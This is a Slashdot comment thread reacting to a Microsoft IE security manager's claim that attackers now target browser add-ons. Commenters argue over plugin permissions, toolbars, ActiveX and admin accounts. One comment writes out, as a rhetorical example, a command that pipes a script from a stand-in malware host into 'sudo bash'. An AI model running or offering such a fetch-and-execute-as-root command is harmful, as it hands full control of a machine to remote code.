Microsoft Blames Add-Ons For Browser Woes 307
darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.'
This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"
Duh (Score:5, Insightful)
Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?
!news
I'll still blame you for everything else. (Score:5, Insightful)
Permissions (Score:5, Insightful)
I've always said this. (Score:5, Insightful)
The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.
This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.
But remember (Score:5, Insightful)
If it's Firefox, it's perfectly OK to blame the add-ons.
Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.
And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.
Re:Permissions (Score:5, Insightful)
I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?
Add on architecture? (Score:1, Insightful)
Microsoft made add-ons essentially super-user in the browser space, and now they complain about add-ons being ill-behaved? If you don't want kids to bang their heads on your playground, perhaps design it better?
Bullshit. Plain utter bullshit. (Score:5, Insightful)
Many non-power-users don't use addons at all.
If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.
Tied down! (Score:2, Insightful)
It's browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!
Re:Bullshit. Plain utter bullshit. (Score:4, Insightful)
Many non-power-users don't use addons at all.
And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.
Re:I've always said this. (Score:3, Insightful)
How about a car analogy?
If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.
Layne
Re:Bullshit. Plain utter bullshit. (Score:5, Insightful)
Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.
If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.
excuses (Score:1, Insightful)
Speaking of add-ons (Score:5, Insightful)
Would an example of this include the Active X Control you have to install to be able to run Windows Update?
Re:Bullshit. Plain utter bullshit. (Score:1, Insightful)
Not knowingly you mean. Most users who don't know much about computers I find have at least 5 different toolbars from various software vendors including but not limited to yahoo, google and adobe. It seems that every fucking program nowadays has some stupid browser toolbar/addon shit tacked onto it you need to tell the installer to NOT FUCKING INSTALL or it will take over your browser.
Re:I think they have a point.. (Score:4, Insightful)
28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.
Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
Plugin model (Score:5, Insightful)
Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?
Take a look at how Chrome handles plugins and then try to pass the buck.
Re:I've always said this. (Score:5, Insightful)
I would agree with you, if "going" to a malware site meant
curl ftp://malwaresite.com/malware.sh [malwaresite.com] | sudo bash
Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.
"Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."
Re:I've always said this. (Score:2, Insightful)
I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine.
You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.
Re:I've always said this. (Score:1, Insightful)
no one knows if their computer is clean
BINGO, motherfucker.
Re:I think they have a point.. (Score:3, Insightful)
Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.
What a joke (Score:1, Insightful)
Yes it's not their fault that Vista was a fuck up. It's not their fault that it takes half an hour to upgrade to IE7.
It's not as if we should care that the Internet is in a dark age for the last 7 years..
ABM (Score:3, Insightful)
This is marking. Blame ABM, Anybody But Microsoft.
Truth is that IE is not the best browser, but is better than it was.
Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.
Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs.
Re:I'll still blame you for everything else. (Score:2, Insightful)
To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):
-I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.
-IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.
-Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different langages...so then FF2 was also sluggish, by your standards.
-Bloated? How? I really don't see any bloat compared to other browsers.
-What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.
(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)
Re:But remember (Score:2, Insightful)
I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser.
They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly.
And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing problems? Disable the plugins, not IE. Drivers making windows bluescreen? Blame the drivers, not Windows.
But still try to sandbox things a little better so buggy extension code doesn't kill the experience.
It's still your damn fault (Score:5, Insightful)
Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.
Re:I think they have a point.. (Score:5, Insightful)
Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows?
Re:Permissions (Score:5, Insightful)
Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.
Re:Permissions (Score:4, Insightful)
IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.
Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)
Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)
Re:Bullshit. Plain utter bullshit. (Score:2, Insightful)
Re:Permissions (Score:3, Insightful)
Why do Mac users and Linux users manage to avoid most of this shit?
I think there are two reasons
1: there is simply less shit availible for thier platform
2: mac and linux users tend to be more experianced and discerning. Nearly all newbies use windows
Re:Largely yes and largely ignorance (mitigation) (Score:3, Insightful)
But tell me FreakinSyco... how many people, think Joe and Jane Sixpack run with non-administrative accounts at home under Windows XP?
Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer and assume it's completely insecure (that's not true).
Further lots of Windows software has assumed the user DOES have administrative privileges. At one point in time Google Desktop would simply not run in a non-admin desktop. Other software dating back to Windows 9x was also guilty of this. Until a couple of years ago Winamp failed to run if you were not an administrator. Why? Because it stored its configuration (Winamp.ini) in C:\Windows and it maintained global settings for the entire machine via the depracted GetPrivateProfileString and WritePrivateProfileSring APIs dating back to Windows 3.x.
Do you think your average user would likely have such information? Or even care? They just want software to work!
This tool is a compromise. 1) People don't like passwords. 2) Most Windows XP users run as administrators with nary an understanding of the dangers getting them to change to a non-admin account has many, MANY barriers 3) This tool is a compromise.
If you run as "god"/root/administrator then by proxy as your browser pulls in crap off the Net, guess what's going to happen? Yes, security issues will persist, such as cross site scripting, but which would you rather have, a browser flaw that at most might steal some file on your system or getting your machine instrumented with a root kit? No system is 100% secure but the key is to minimize exposure.
RemoveAdmin leverages a security API that's actually part of Windows Vista as well. If you have an end user that has foolishly turned off UAC. This tool will work there. It will also work with Windows 2000.
-M
Re:Permissions (Score:5, Insightful)
Just in case anyone was going to interpret this literally:
Ideally, most of these plugins should be setuid as nobody
No, no, a thousand times no!
I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.
These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.
The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.
In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.
But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!
Re:Permissions (Score:1, Insightful)
Typical business users runs with the (default) flag "hide estnsions for known filetypes" and uses "Import" when they need a .txt file in Excel.